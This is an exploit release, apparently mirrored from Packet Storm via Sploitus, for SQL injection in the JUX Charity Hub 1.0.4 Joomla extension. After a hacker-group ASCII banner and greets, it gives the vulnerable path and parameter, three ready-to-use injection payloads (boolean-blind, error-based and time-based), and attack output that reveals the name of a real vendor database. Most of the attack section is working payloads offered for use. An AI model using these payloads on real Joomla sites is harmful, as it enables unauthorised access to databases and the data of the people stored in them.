## https://sploitus.com/exploit?id=PACKETSTORM:168591
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Exploits ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr :
โ Website : extensions.joomla.org โ
โ Vendor : JoomlaUX - joomlaux.com โ
โ Software : JUX Charity Hub 1.0.4 Extension for Joomla โ
โ Vuln Type: SQL Injection โ
โ Method : GET โ
โ Impact : Database Access โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ B4nks-NET irc.b4nks.tk #unix โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ Typically used for remotely exploitable vulnerabilities that can lead to โ
โ system compromise โ
โ โ
โ โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ ยฉ CraCkEr 2022 โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Path: /extensions/charityhub/index.php/causes/grid-causes/grid-causes-no-sidebar/causes
GET parameter 'title' is vulnerable
---
Parameter: title (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=-7388' OR 2114=2114#&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 4175 FROM(SELECT COUNT(*),CONCAT(0x71707a7871,(SELECT (ELT(4175=4175,1))),0x717a626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- GUzX&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=com_jux_charity_hub&view=causes&list_style=grid&Itemid=107&title=1' AND (SELECT 8556 FROM (SELECT(SLEEP(5)))SnfZ)-- awOv&goal_slider_lower=3000&goal_slider_upper=900000&c_id=10&donated_status=0&country_id=223&jform[locstate]=17&published_up=&published_down=&button=Search
---
[+] Starting the Attack
[INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.19
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[INFO] fetching current database
current database: 'joomlaux_charityhub2'
[-] Done